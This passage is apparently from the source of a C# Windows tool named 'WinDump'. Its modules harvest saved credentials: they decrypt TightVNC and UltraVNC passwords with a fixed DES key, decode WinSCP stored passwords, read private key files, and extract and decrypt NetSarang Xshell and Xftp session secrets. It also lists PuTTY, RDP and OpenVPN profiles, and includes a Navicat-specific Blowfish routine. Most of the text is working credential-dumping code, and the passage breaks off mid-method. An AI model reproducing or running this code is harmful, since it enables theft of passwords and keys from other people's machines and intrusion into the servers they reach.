0x530FF8EE, 0x468DDE7D, 0xD5730A1D, 0x4CD04DC6, 0x2939BBDB, 0xA9BA4650, 0xAC9526E8, 0xBE5EE304, 0xA1FAD5F0, 0x6A2D519A, 0x63EF8CE2, 0x9A86EE22, 242 | 0xC089C2B8, 0x43242EF6, 0xA51E03AA, 0x9CF2D0A4, 0x83C061BA, 0x9BE96A4D, 0x8FE51550, 0xBA645BD6, 0x2826A2F9, 0xA73A3AE1, 0x4BA99586, 0xEF5562E9, 0xC72FEFD3, 0xF752F7DA, 0x3F046F69, 0x77FA0A59, 243 | 0x80E4A915, 0x87B08601, 0x9B09E6AD, 0x3B3EE593, 
0xE990FD5A, 0x9E34D797, 0x2CF0B7D9, 0x022B8B51, 0x96D5AC3A, 0x017DA67D, 0xD1CF3ED6, 0x7C7D2D28, 0x1F9F25CF, 0xADF2B89B, 0x5AD6B472, 0x5A88F54C, 244 | 0xE029AC71, 0xE019A5E6, 0x47B0ACFD, 0xED93FA9B, 0xE8D3C48D, 0x283B57CC, 0xF8D56629, 0x79132E28, 0x785F0191, 0xED756055, 0xF7960E44, 0xE3D35E8C, 0x15056DD4, 0x88F46DBA, 0x03A16125, 0x0564F0BD, 245 | 0xC3EB9E15, 0x3C9057A2, 0x97271AEC, 0xA93A072A, 0x1B3F6D9B, 0x1E6321F5, 0xF59C66FB, 0x26DCF319, 0x7533D928, 0xB155FDF5, 0x03563482, 0x8ABA3CBB, 0x28517711, 0xC20AD9F8, 0xABCC5167, 0xCCAD925F, 246 | 0x4DE81751, 0x3830DC8E, 0x379D5862, 0x9320F991, 0xEA7A90C2, 0xFB3E7BCE, 0x5121CE64, 0x774FBE32, 0xA8B6E37E, 0xC3293D46, 0x48DE5369, 0x6413E680, 0xA2AE0810, 0xDD6DB224, 0x69852DFD, 0x09072166, 247 | 0xB39A460A, 0x6445C0DD, 0x586CDECF, 0x1C20C8AE, 0x5BBEF7DD, 0x1B588D40, 0xCCD2017F, 0x6BB4E3BB, 0xDDA26A7E, 0x3A59FF45, 0x3E350A44, 0xBCB4CDD5, 0x72EACEA8, 0xFA6484BB, 0x8D6612AE, 0xBF3C6F47, 248 | 0xD29BE463, 0x542F5D9E, 0xAEC2771B, 0xF64E6370, 0x740E0D8D, 0xE75B1357, 0xF8721671, 0xAF537D5D, 0x4040CB08, 0x4EB4E2CC, 0x34D2466A, 0x0115AF84, 0xE1B00428, 0x95983A1D, 0x06B89FB4, 0xCE6EA048, 249 | 0x6F3F3B82, 0x3520AB82, 0x011A1D4B, 0x277227F8, 0x611560B1, 0xE7933FDC, 0xBB3A792B, 0x344525BD, 0xA08839E1, 0x51CE794B, 0x2F32C9B7, 0xA01FBAC9, 0xE01CC87E, 0xBCC7D1F6, 0xCF0111C3, 0xA1E8AAC7, 250 | 0x1A908749, 0xD44FBD9A, 0xD0DADECB, 0xD50ADA38, 0x0339C32A, 0xC6913667, 0x8DF9317C, 0xE0B12B4F, 0xF79E59B7, 0x43F5BB3A, 0xF2D519FF, 0x27D9459C, 0xBF97222C, 0x15E6FC2A, 0x0F91FC71, 0x9B941525, 251 | 0xFAE59361, 0xCEB69CEB, 0xC2A86459, 0x12BAA8D1, 0xB6C1075E, 0xE3056A0C, 0x10D25065, 0xCB03A442, 0xE0EC6E0E, 0x1698DB3B, 0x4C98A0BE, 0x3278E964, 0x9F1F9532, 0xE0D392DF, 0xD3A0342B, 0x8971F21E, 252 | 0x1B0A7441, 0x4BA3348C, 0xC5BE7120, 0xC37632D8, 0xDF359F8D, 0x9B992F2E, 0xE60B6F47, 0x0FE3F11D, 0xE54CDA54, 0x1EDAD891, 0xCE6279CF, 0xCD3E7E6F, 0x1618B166, 0xFD2C1D05, 0x848FD2C5, 0xF6FB2299, 253 | 0xF523F357, 0xA6327623, 0x93A83531, 0x56CCCD02, 0xACF08162, 
0x5A75EBB5, 0x6E163697, 0x88D273CC, 0xDE966292, 0x81B949D0, 0x4C50901B, 0x71C65614, 0xE6C6C7BD, 0x327A140A, 0x45E1D006, 0xC3F27B9A, 254 | 0xC9AA53FD, 0x62A80F00, 0xBB25BFE2, 0x35BDD2F6, 0x71126905, 0xB2040222, 0xB6CBCF7C, 0xCD769C2B, 0x53113EC0, 0x1640E3D3, 0x38ABBD60, 0x2547ADF0, 0xBA38209C, 0xF746CE76, 0x77AFA1C5, 0x20756060, 255 | 0x85CBFE4E, 0x8AE88DD8, 0x7AAAF9B0, 0x4CF9AA7E, 0x1948C25C, 0x02FB8A8C, 0x01C36AE4, 0xD6EBE1F9, 0x90D4F869, 0xA65CDEA0, 0x3F09252D, 0xC208E69F, 0xB74E6132, 0xCE77E25B, 0x578FDFE3, 0x3AC372E6 256 | } 257 | }; 258 | 259 | private UInt32[] SubKey; 260 | private UInt32[,] SBox; 261 | 262 | private UInt32 _F_Transform(UInt32 x) 263 | { 264 | byte[] x_bytes = BitConverter.GetBytes(x); 265 | if (BitConverter.IsLittleEndian == false) 266 | Array.Reverse(x_bytes); 267 | return ((SBox[0, x_bytes[3]] + SBox[1, x_bytes[2]]) ^ SBox[2, x_bytes[1]]) + SBox[3, x_bytes[0]]; 268 | } 269 | 270 | public void Encrypt(byte[] srcBytes, Endian endian) 271 | { 272 | byte[] L_bytes = new byte[4]; 273 | byte[] R_bytes = new byte[4]; 274 | Array.Copy(srcBytes, 0, L_bytes, 0, 4); 275 | Array.Copy(srcBytes, 4, R_bytes, 0, 4); 276 | 277 | if (BitConverter.IsLittleEndian && endian == Endian.Big || BitConverter.IsLittleEndian == false && endian == Endian.Little) 278 | { 279 | Array.Reverse(L_bytes); 280 | Array.Reverse(R_bytes); 281 | } 282 | 283 | UInt32 L = BitConverter.ToUInt32(L_bytes, 0); 284 | UInt32 R = BitConverter.ToUInt32(R_bytes, 0); 285 | 286 | L ^= SubKey[0]; 287 | R ^= _F_Transform(L); 288 | 289 | R ^= SubKey[1]; 290 | L ^= _F_Transform(R); 291 | 292 | L ^= SubKey[2]; 293 | R ^= _F_Transform(L); 294 | 295 | R ^= SubKey[3]; 296 | L ^= _F_Transform(R); 297 | 298 | L ^= SubKey[4]; 299 | R ^= _F_Transform(L); 300 | 301 | R ^= SubKey[5]; 302 | L ^= _F_Transform(R); 303 | 304 | L ^= SubKey[6]; 305 | R ^= _F_Transform(L); 306 | 307 | R ^= SubKey[7]; 308 | L ^= _F_Transform(R); 309 | 310 | L ^= SubKey[8]; 311 | R ^= _F_Transform(L); 312 | 313 | R ^= SubKey[9]; 
314 | L ^= _F_Transform(R); 315 | 316 | L ^= SubKey[10]; 317 | R ^= _F_Transform(L); 318 | 319 | R ^= SubKey[11]; 320 | L ^= _F_Transform(R); 321 | 322 | L ^= SubKey[12]; 323 | R ^= _F_Transform(L); 324 | 325 | R ^= SubKey[13]; 326 | L ^= _F_Transform(R); 327 | 328 | L ^= SubKey[14]; 329 | R ^= _F_Transform(L); 330 | 331 | R ^= SubKey[15]; 332 | L ^= _F_Transform(R); 333 | 334 | L ^= SubKey[16]; 335 | R ^= SubKey[17]; 336 | 337 | L_bytes = BitConverter.GetBytes(R); 338 | R_bytes = BitConverter.GetBytes(L); 339 | 340 | if (BitConverter.IsLittleEndian && endian == Endian.Big || BitConverter.IsLittleEndian == false && endian == Endian.Little) 341 | { 342 | Array.Reverse(L_bytes); 343 | Array.Reverse(R_bytes); 344 | } 345 | 346 | Array.Copy(L_bytes, 0, srcBytes, 0, 4); 347 | Array.Copy(R_bytes, 0, srcBytes, 4, 4); 348 | } 349 | 350 | public void Decrypt(byte[] srcBytes, Endian endian) 351 | { 352 | byte[] L_bytes = new byte[4]; 353 | byte[] R_bytes = new byte[4]; 354 | Array.Copy(srcBytes, 0, L_bytes, 0, 4); 355 | Array.Copy(srcBytes, 4, R_bytes, 0, 4); 356 | 357 | if (BitConverter.IsLittleEndian && endian == Endian.Big || BitConverter.IsLittleEndian == false && endian == Endian.Little) 358 | { 359 | Array.Reverse(L_bytes); 360 | Array.Reverse(R_bytes); 361 | } 362 | 363 | UInt32 L = BitConverter.ToUInt32(R_bytes, 0); 364 | UInt32 R = BitConverter.ToUInt32(L_bytes, 0); 365 | 366 | L ^= SubKey[16]; 367 | R ^= SubKey[17]; 368 | 369 | L ^= _F_Transform(R); 370 | R ^= SubKey[15]; 371 | 372 | R ^= _F_Transform(L); 373 | L ^= SubKey[14]; 374 | 375 | L ^= _F_Transform(R); 376 | R ^= SubKey[13]; 377 | 378 | R ^= _F_Transform(L); 379 | L ^= SubKey[12]; 380 | 381 | L ^= _F_Transform(R); 382 | R ^= SubKey[11]; 383 | 384 | R ^= _F_Transform(L); 385 | L ^= SubKey[10]; 386 | 387 | L ^= _F_Transform(R); 388 | R ^= SubKey[9]; 389 | 390 | R ^= _F_Transform(L); 391 | L ^= SubKey[8]; 392 | 393 | L ^= _F_Transform(R); 394 | R ^= SubKey[7]; 395 | 396 | R ^= _F_Transform(L); 397 | L ^= 
SubKey[6]; 398 | 399 | L ^= _F_Transform(R); 400 | R ^= SubKey[5]; 401 | 402 | R ^= _F_Transform(L); 403 | L ^= SubKey[4]; 404 | 405 | L ^= _F_Transform(R); 406 | R ^= SubKey[3]; 407 | 408 | R ^= _F_Transform(L); 409 | L ^= SubKey[2]; 410 | 411 | L ^= _F_Transform(R); 412 | R ^= SubKey[1]; 413 | 414 | R ^= _F_Transform(L); 415 | L ^= SubKey[0]; 416 | 417 | L_bytes = BitConverter.GetBytes(L); 418 | R_bytes = BitConverter.GetBytes(R); 419 | 420 | if (BitConverter.IsLittleEndian && endian == Endian.Big || BitConverter.IsLittleEndian == false && endian == Endian.Little) 421 | { 422 | Array.Reverse(L_bytes); 423 | Array.Reverse(R_bytes); 424 | } 425 | 426 | Array.Copy(L_bytes, 0, srcBytes, 0, 4); 427 | Array.Copy(R_bytes, 0, srcBytes, 4, 4); 428 | } 429 | 430 | public BlowfishNavicat(byte[] UserKey) 431 | { 432 | 433 | 434 | SubKey = OriginPBox.Clone() as UInt32[]; 435 | SBox = OriginSBox.Clone() as UInt32[,]; 436 | 437 | for (int i = 0; i < 18; ++i) 438 | { 439 | UInt32 temp = 0; 440 | 441 | temp <<= 8; 442 | temp |= UserKey[(i * 4) % UserKey.Length]; 443 | temp <<= 8; 444 | temp |= UserKey[(i * 4 + 1) % UserKey.Length]; 445 | temp <<= 8; 446 | temp |= UserKey[(i * 4 + 2) % UserKey.Length]; 447 | temp <<= 8; 448 | temp |= UserKey[(i * 4 + 3) % UserKey.Length]; 449 | 450 | SubKey[i] ^= temp; 451 | } 452 | 453 | byte[] _temp = new byte[8]; 454 | for (int i = 0; i < 9; ++i) 455 | { 456 | Encrypt(_temp, Endian.Little); 457 | Buffer.BlockCopy(_temp, 0, SubKey, sizeof(UInt32) * 2 * i, 8); 458 | } 459 | 460 | for (int i = 0; i < 4; ++i) 461 | { 462 | for (int j = 0; j < 128; ++j) 463 | { 464 | Encrypt(_temp, Endian.Little); 465 | Buffer.BlockCopy(_temp, 0, SBox, 256 * sizeof(UInt32) * i + sizeof(UInt64) * j, sizeof(UInt64)); 466 | } 467 | } 468 | } 469 | } 470 | } 471 | -------------------------------------------------------------------------------- /Cred/OpenVPN.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using 
System.Collections.Generic;
using System.Data;
using System.IO;
using System.Text;

namespace WinDump
{
    /// <summary>
    /// Collects OpenVPN client profiles kept under the current user's profile directory.
    /// </summary>
    internal class OpenVPN
    {
        /// <summary>
        /// Passes the per-user OpenVPN "config" directory to Directories.DirDump, limited to
        /// *.ovpn files in all subdirectories.
        /// </summary>
        /// <returns>
        /// null when %USERPROFILE%\OpenVPN does not exist; otherwise whatever
        /// Directories.DirDump returns (that helper is defined elsewhere in the project).
        /// </returns>
        /// <remarks>
        /// Only the parent directory is tested for existence; the "config" subdirectory is
        /// handed on unchecked. Profile files of this type can carry certificates and private
        /// keys inline, so the result should be treated as secret material by whoever stores it.
        /// </remarks>
        internal static DataTable GetOpenVPN()
        {
            string profileRoot = Environment.ExpandEnvironmentVariables(@"%USERPROFILE%\OpenVPN");
            if (Directory.Exists(profileRoot))
            {
                string configDir = Path.Combine(profileRoot, "config");
                // The meaning of the boolean argument is defined by DirDump, not visible here.
                return Directories.DirDump(configDir, true, "*.ovpn", SearchOption.AllDirectories);
            }
            return null;
        }
    }
}

--------------------------------------------------------------------------------
/Cred/Putty.cs:
--------------------------------------------------------------------------------
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Data;
using System.Text;

namespace WinDump
{
    /// <summary>
    /// Lists the PuTTY sessions saved in the current user's registry hive.
    /// </summary>
    internal class Putty
    {
        /// <summary>
        /// Builds one row per subkey of HKCU\Software\SimonTatham\PuTTY\Sessions with the
        /// session name and its Protocol, HostName, PortNumber and SerialLine values.
        /// </summary>
        /// <returns>
        /// The table; it has the five columns but no rows when either registry key is missing.
        /// </returns>
        /// <remarks>
        /// No password or key value is read here; the output is an inventory of saved
        /// endpoints. Values that are absent are reported as empty strings.
        /// </remarks>
        internal static DataTable GetPutty()
        {
            var table = new DataTable();
            foreach (var column in new[] { "Name", "Protocol", "HostName", "PortNumber", "SerialLine" })
            {
                table.Columns.Add(column);
            }

            const string vendorPath = @"Software\SimonTatham";

            // Probe the vendor key first; nothing to report when PuTTY never wrote to this hive.
            using (var vendorKey = Registry.CurrentUser.OpenSubKey(vendorPath, false))
            {
                if (vendorKey == null)
                {
                    return table;
                }
            }

            using (var sessions = Registry.CurrentUser.OpenSubKey(vendorPath + @"\PuTTY\Sessions", false))
            {
                if (sessions == null)
                {
                    return table;
                }

                foreach (var sessionName in sessions.GetSubKeyNames())
                {
                    using (var session = sessions.OpenSubKey(sessionName))
                    {
                        table.Rows.Add(
                            sessionName,
                            session.GetValue("Protocol", ""),
                            session.GetValue("HostName", ""),
                            session.GetValue("PortNumber", ""),
                            session.GetValue("SerialLine", ""));
                    }
                }
            }

            return table;
        }
    }
}

--------------------------------------------------------------------------------
/Cred/RDP.cs:
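--------------------------------------------------------------------------------
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Data;
using System.Text;

namespace WinDump
{
    /// <summary>
    /// Lists the Remote Desktop servers remembered for the current user.
    /// </summary>
    internal class RDP
    {
        /// <summary>
        /// Builds one row per subkey of HKCU\Software\Microsoft\Terminal Server Client\Servers:
        /// the subkey name and its UsernameHint value (empty string when absent).
        /// </summary>
        /// <returns>The table; no rows when the Servers key does not exist.</returns>
        internal static DataTable GetRDP()
        {
            var dt = new DataTable();
            dt.Columns.Add("Name");
            dt.Columns.Add("Username");

            // The parent key is now disposed as well; it used to stay open until finalization.
            using (var key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Terminal Server Client\Servers", false))
            {
                if (key == null)
                {
                    return dt;
                }
                foreach (var subkeyname in key.GetSubKeyNames())
                {
                    using (var subkey = key.OpenSubKey(subkeyname, false))
                    {
                        var username = subkey.GetValue("UsernameHint", "");
                        dt.Rows.Add(subkeyname, username);
                    }
                }
            }

            return dt;
        }
    }
}

--------------------------------------------------------------------------------
/Cred/TightVNC.cs:
--------------------------------------------------------------------------------
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Data;
using System.IO;
using System.Security.Cryptography;
using System.Text;

namespace WinDump
{
    /// <summary>
    /// Reads the TightVNC server settings from the registry and decodes the stored passwords.
    /// </summary>
    internal class TightVNC
    {
        /// <summary>
        /// Looks at SOFTWARE\TightVNC\Server under HKCU and HKLM and adds one row per hive that
        /// has the key: hive name, RfbPort (5900 when absent) and the three decoded passwords.
        /// </summary>
        /// <returns>The table; hives without the key, or that fail to read, add no row.</returns>
        internal static DataTable GetTightVNC()
        {
            var dt = new DataTable();
            dt.Columns.Add("Name");
            dt.Columns.Add("Port");
            dt.Columns.Add("Password");
            dt.Columns.Add("ControlPassword");
            dt.Columns.Add("PasswordViewOnly");
            foreach (var root in new RegistryKey[] { Registry.CurrentUser, Registry.LocalMachine })
            {
                try
                {
                    using (var key = root.OpenSubKey(@"SOFTWARE\TightVNC\Server"))
                    {
                        if (key == null)
                        {
                            continue;
                        }
                        var name = root.Name;
                        var port = key.GetValue("RfbPort", 5900).ToString();
                        var pwd = key.GetValue("Password", null);
                        var cpwd = key.GetValue("ControlPassword", null);
                        var vpwd = key.GetValue("PasswordViewOnly", null);
                        // "as byte[]" yields null for a missing or non-binary value, which
                        // Decrypt maps to an empty string.
                        dt.Rows.Add(name, port, Decrypt(pwd as byte[]), Decrypt(cpwd as byte[]), Decrypt(vpwd as byte[]));
                    }
                }
                catch
                {
                    // Deliberate best effort: a hive that cannot be read or decoded is skipped
                    // and the other hive is still tried.
                }
            }
            return dt;
        }

        /// <summary>
        /// DES-ECB decrypts <paramref name="data"/> with the fixed 8-byte key below (zero
        /// padding) and returns the result decoded as UTF-8.
        /// </summary>
        /// <param name="data">Stored password bytes; null is accepted.</param>
        /// <returns>The decoded text, or an empty string when <paramref name="data"/> is null.</returns>
        /// <remarks>
        /// The key is a constant compiled into this source, so the stored value is obfuscation
        /// rather than protection: whoever can read the registry value can recover the
        /// password. The practical control is who may read that key, not the encoding.
        /// </remarks>
        internal static string Decrypt(byte[] data)
        {
            if (data == null)
            {
                return "";
            }
            // The provider and the transform hold native handles; both are now disposed.
            using (var des = new DESCryptoServiceProvider
            {
                Mode = CipherMode.ECB,
                Padding = PaddingMode.Zeros,
                Key = new byte[] { 0xE8, 0x4A, 0xD6, 0x60, 0xC4, 0x72, 0x1A, 0xE0 }
            })
            using (var decryptor = des.CreateDecryptor())
            using (var ms = new MemoryStream(data))
            using (CryptoStream cryptoStream = new CryptoStream(ms, decryptor, CryptoStreamMode.Read))
            using (StreamReader streamReader = new StreamReader(cryptoStream, Encoding.UTF8))
            {
                return streamReader.ReadToEnd();
            }
        }
    }
}

--------------------------------------------------------------------------------
/Cred/UltraVNC.cs:
--------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.Data;
using System.IO;
using System.Text;

namespace WinDump
{
    /// <summary>
    /// Reads ultravnc.ini from each UltraVNC install location and decodes the stored passwords.
    /// </summary>
    internal class UltraVNC
    {
        /// <summary>
        /// For every location returned by Utils.GetAppLocation("UltraVNC") that contains
        /// ultravnc.ini, adds a row with the port ("5900" when [admin] PortNumber is absent)
        /// and the decoded [ultravnc] passwd and passwd2 values.
        /// </summary>
        /// <returns>The table; locations without the directory or the ini file add no row.</returns>
        /// <remarks>
        /// Decoding reuses TightVNC.Decrypt, i.e. the same fixed DES key.
        /// NOTE(review): config.GetValue can evidently return null (see the "??" on the port);
        /// whether Utils.FromHex accepts null is not visible here — confirm.
        /// </remarks>
        internal static DataTable GetUltraVNC()
        {
            DataTable dt = new DataTable();
            dt.Columns.Add("Port");
            dt.Columns.Add("Password");
            dt.Columns.Add("PasswordViewOnly");
            foreach (var loc in Utils.GetAppLocation("UltraVNC"))
            {
                if (!Directory.Exists(loc))
                {
                    continue;
                }
                var configPath = Path.Combine(loc, "ultravnc.ini");
                if (!File.Exists(configPath))
                {
                    continue;
                }
                var config = new IniParser(configPath);
                var epwd = Utils.FromHex(config.GetValue("ultravnc", "passwd"));
                var epwd2 = Utils.FromHex(config.GetValue("ultravnc", "passwd2"));
                var port = config.GetValue("admin", "PortNumber") ?? "5900";
                var pwd = "";
                if (epwd != null)
                {
                    // Only the first 8 bytes (one DES block) are decoded; shorter input is zero-extended.
                    Array.Resize(ref epwd, 8);
                    pwd = TightVNC.Decrypt(epwd);
                }
                var pwd2 = "";
                if (epwd2 != null)
                {
                    Array.Resize(ref epwd2, 8);
                    pwd2 = TightVNC.Decrypt(epwd2);
                }
                dt.Rows.Add(port, pwd, pwd2);
            }
            return dt;
        }
    }
}

--------------------------------------------------------------------------------
/Cred/WinSCP.cs:
--------------------------------------------------------------------------------
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Data;
using System.IO;
using System.Runtime.Remoting.Messaging;
using System.Text;

namespace WinDump
{
    /// <summary>
    /// Reads the WinSCP sessions saved in the current user's registry hive.
    /// </summary>
    internal class WinSCP
    {
        /// <summary>
        /// Builds one row per subkey of HKCU\Software\Martin Prikryl\WinSCP 2\Sessions that has
        /// a non-empty HostName: session name, host, port (22 when absent), user, the decoded
        /// Password value and the text of the file named by PublicKeyFile when that file exists.
        /// </summary>
        /// <returns>The table; no rows when either registry key is missing.</returns>
        /// <remarks>
        /// The decoding in Decrypt_WinSCP needs only values stored in the same session key, so
        /// a password saved this way is readable by any process running as the user. WinSCP's
        /// master-password option is the product-side control for that.
        /// </remarks>
        internal static DataTable GetWinSCP()
        {
            DataTable dt = new DataTable();
            dt.Columns.Add("Name");
            dt.Columns.Add("Host");
            dt.Columns.Add("Port");
            dt.Columns.Add("User");
            dt.Columns.Add("Pass");
            dt.Columns.Add("Key");
            var basePath = @"Software\Martin Prikryl";
            using (var key = Registry.CurrentUser.OpenSubKey(basePath, false))
            {
                if (key == null)
                {
                    return dt;
                }
            }
            using (var key = Registry.CurrentUser.OpenSubKey(basePath + @"\WinSCP 2\Sessions", false))
            {
                if (key == null)
                {
                    return dt;
                }
                foreach (var subname in key.GetSubKeyNames())
                {
                    using (var subkey = key.OpenSubKey(subname, false))
                    {
                        var host = subkey.GetValue("HostName", "").ToString();
                        if (host.Length == 0)
                        {
                            continue;
                        }
                        var port = subkey.GetValue("PortNumber", 22);
                        var user = subkey.GetValue("UserName", "").ToString();
                        var pass = subkey.GetValue("Password", "").ToString();
                        var keypath = subkey.GetValue("PublicKeyFile", "").ToString();
                        if (pass.Length != 0)
                        {
                            pass = Decrypt_WinSCP(user, pass, host);
                        }
                        var keyContent = "";
                        if (keypath.Length != 0)
                        {
                            // The stored path is percent-encoded.
                            keypath = Uri.UnescapeDataString(keypath);
                            if (File.Exists(keypath))
                            {
                                keyContent = File.ReadAllText(keypath);
                            }
                        }
                        dt.Rows.Add(subname, host, port, user, pass, keyContent);
                    }
                }
                return dt;
            }
        }

        /// <summary>
        /// Decodes a stored WinSCP password string (upper-case hex text).
        /// </summary>
        /// <param name="user">UserName of the session.</param>
        /// <param name="pass">Stored Password value; must be non-empty.</param>
        /// <param name="host">HostName of the session.</param>
        /// <returns>The decoded text with the leading user+host marker removed.</returns>
        /// <remarks>
        /// The generic type arguments had been lost from the listing ("List list = new List()");
        /// they are restored as List&lt;string&gt;, which is what the element use requires.
        /// NOTE(review): when user+host does not occur in the decoded text, IndexOf returns -1
        /// and string.Remove throws; lower-case hex digits make int.Parse throw in Dec_nex.
        /// Neither is handled here or by the caller.
        /// </remarks>
        static string Decrypt_WinSCP(string user, string pass, string host)
        {
            // Expand every hex digit into its decimal value, kept as text ("A" -> "10").
            List<string> nibbles = new List<string>();
            for (int i = 0; i < pass.Length; i++)
            {
                string digit = pass[i].ToString();
                switch (digit)
                {
                    case "A": nibbles.Add("10"); break;
                    case "B": nibbles.Add("11"); break;
                    case "C": nibbles.Add("12"); break;
                    case "D": nibbles.Add("13"); break;
                    case "E": nibbles.Add("14"); break;
                    case "F": nibbles.Add("15"); break;
                }
                if ("ABCDEF".IndexOf(digit) == -1)
                {
                    nibbles.Add(digit);
                }
            }

            // A leading decoded byte of 255 marks the form that carries an explicit length.
            int length = 0;
            if (Dec_nex(nibbles) == 255)
            {
                for (int n = 0; n < 4; n++)
                {
                    nibbles.RemoveAt(0);
                }
                length = Dec_nex(nibbles);
            }
            nibbles.RemoveAt(0);
            nibbles.RemoveAt(0);

            // The next decoded byte says how many bytes (two nibbles each) to drop.
            int skip = Dec_nex(nibbles) * 2;
            for (int k = 0; k < skip; k++)
            {
                nibbles.RemoveAt(0);
            }

            string text = "";
            for (int l = 0; l <= length; l++)
            {
                text += ((char)Dec_nex(nibbles)).ToString();
                nibbles.RemoveAt(0);
                nibbles.RemoveAt(0);
            }

            // The decoded text is prefixed with user+host; cut up to it and strip it.
            string marker = user + host;
            int markerAt = text.IndexOf(marker);
            text = text.Remove(0, markerAt);
            return text.Replace(marker, "");
        }

        /// <summary>
        /// Decodes the byte formed by the first two entries of <paramref name="list"/>
        /// (high nibble, low nibble, each as decimal text): XOR with 163, then bitwise NOT
        /// within 8 bits.
        /// </summary>
        static int Dec_nex(List<string> list)
        {
            int high = int.Parse(list[0]);
            int low = int.Parse(list[1]);
            return 255 ^ (((high << 4) + low ^ 163) & 255);
        }
    }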
}

--------------------------------------------------------------------------------
/Cred/XManager.cs:
--------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.Data;
using System.IO;
using System.Security.Cryptography;
using System.Security.Principal;
using System.Text;

namespace WinDump
{
    internal class XManager
    {
        // Identity of the running user; not referenced by GetSession itself
        // (presumably used by the Decrypt helper defined further down — confirm).
        internal static WindowsIdentity id = WindowsIdentity.GetCurrent();

        /// <summary>
        /// Collects the session files found under "Documents\NetSarang Computer" into one
        /// table: *.xsh (Xshell), *.xfp (Xftp), *.xcas (Xstart), *.xard (RDP) and
        /// *.xvnc (VNC), searched recursively.
        /// </summary>
        /// <returns>
        /// The table with one row per session file; it has the ten columns but no rows when
        /// the NetSarang directory does not exist.
        /// </returns>
        /// <remarks>
        /// Password and passphrase fields are copied from the file as stored; every row is
        /// then handed to Decrypt(row), which is defined outside this method.
        /// </remarks>
        internal static DataTable GetSession()
        {
            var dt = new DataTable();
            foreach (var column in new[] { "Name", "Proto", "Host", "Port", "User", "Password", "Key", "Passphrase", "LastModified", "Version" })
            {
                dt.Columns.Add(column);
            }

            string documents = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments);
            string nsPath = Path.Combine(documents, "NetSarang Computer");
            if (!Directory.Exists(nsPath))
            {
                return dt;
            }

            // Xshell
            foreach (var path in Directory.GetFiles(nsPath, "*.xsh", SearchOption.AllDirectories))
            {
                var session = new IniParser(path);
                var name = Path.GetFileName(path);
                var proto = session.GetValue("CONNECTION", "Protocol");
                var host = session.GetValue("CONNECTION", "Host");
                var port = session.GetValue("CONNECTION", "Port");
                var user = session.GetValue("CONNECTION:AUTHENTICATION", "UserName");
                // stored (still encrypted) password
                var pass = session.GetValue("CONNECTION:AUTHENTICATION", "Password");
                var key = session.GetValue("CONNECTION:AUTHENTICATION", "UserKey");
                // stored (still encrypted) passphrase
                var phrase = session.GetValue("CONNECTION:AUTHENTICATION", "Passphrase");
                var last = File.GetLastWriteTime(path);
                var version = session.GetValue("SessionInfo", "Version");
                dt.Rows.Add(name, proto, host, port, user, pass, key, phrase, last, version);
            }

            // Xftp
            foreach (var path in Directory.GetFiles(nsPath, "*.xfp", SearchOption.AllDirectories))
            {
                var session = new IniParser(path);
                var name = Path.GetFileName(path);
                string proto;
                if (session.GetValue("CONNECTION", "Protocol") == "0")
                {
                    proto = "FTP";
                }
                else
                {
                    proto = "SFTP";
                }
                var host = session.GetValue("CONNECTION", "Host");
                var port = session.GetValue("CONNECTION", "Port");
                var user = session.GetValue("CONNECTION", "UserName");
                // stored (still encrypted) password
                var pass = session.GetValue("CONNECTION", "Password");
                var key = session.GetValue("CONNECTION", "UserKey");
                // stored (still encrypted) passphrase
                var phrase = session.GetValue("CONNECTION", "UserKeyPassPhrase");
                var last = File.GetLastWriteTime(path);
                var version = session.GetValue("SessionInfo", "Version");
                dt.Rows.Add(name, proto, host, port, user, pass, key, phrase, last, version);
            }

            // Xstart
            foreach (var path in Directory.GetFiles(nsPath, "*.xcas", SearchOption.AllDirectories))
            {
                var session = new IniParser(path);
                var name = Path.GetFileName(path);
                // NOTE(review): same "0" -> FTP / otherwise SFTP mapping as the Xftp loop;
                // looks copied — confirm it is right for Xstart sessions.
                string proto;
                if (session.GetValue("SESSION", "Protocol") == "0")
                {
                    proto = "FTP";
                }
                else
                {
                    proto = "SFTP";
                }
                var host = session.GetValue("SESSION", "Host");
                var port = session.GetValue("SSH", "Port");
                var user = session.GetValue("SESSION", "UserName");
                // stored (still encrypted) password
                var pass = session.GetValue("SESSION", "Password");
                var key = session.GetValue("SSH", "PublicKey");
                // stored (still encrypted) passphrase
                var phrase = session.GetValue("SSH", "Passphrase");
                var last = File.GetLastWriteTime(path);
                var version = session.GetValue("SessionInfo", "Version");
                dt.Rows.Add(name, proto, host, port, user, pass, key, phrase, last, version);
            }

            // RDP
            foreach (var path in Directory.GetFiles(nsPath, "*.xard", SearchOption.AllDirectories))
            {
                var session = new IniParser(path);
                var name = Path.GetFileName(path);
                var proto = session.GetValue("GENERAL", "Protocol");
                var host = session.GetValue("GENERAL", "Host");
                var port = session.GetValue("GENERAL", "Port");
                var user = session.GetValue("GENERAL", "UserName");
                // stored (still encrypted) password
                var pass = session.GetValue("GENERAL", "Password");
                var last = File.GetLastWriteTime(path);
                // These files take the version from the path instead of a SessionInfo section.
                var version = GetVersionFromPath(path);
                dt.Rows.Add(name, proto, host, port, user, pass, "", "", last, version);
            }

            // VNC
            foreach (var path in Directory.GetFiles(nsPath, "*.xvnc", SearchOption.AllDirectories))
            {
                var session = new IniParser(path);
                var name = Path.GetFileName(path);
                var host = session.GetValue("CONNECTION", "Host");
                var port = session.GetValue("CONNECTION", "Port");
                // stored (still encrypted) password
                var pass = session.GetValue("SESSION", "Password");
                var last = File.GetLastWriteTime(path);
                var version = GetVersionFromPath(path);
                dt.Rows.Add(name, "VNC", host, port, "", pass, "", "", last, version);
            }

            // Second pass: every collected row goes through Decrypt.
            foreach (DataRow row in dt.Rows)
            {
                Decrypt(row);
            }
            return dt;
        }
        internal static
DataTable GetUserKey()
        {
            // Returns one row per "*.pri" file found anywhere under
            // <MyDocuments>\NetSarang Computer: Name = file name, Content = the file
            // read as text. An empty table is returned when the folder does not exist.
            // NOTE(review): the method name suggests these files are user private keys — confirm.
            var dt = new DataTable();
            dt.Columns.Add("Name");
            dt.Columns.Add("Content");
            string docPath = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments);
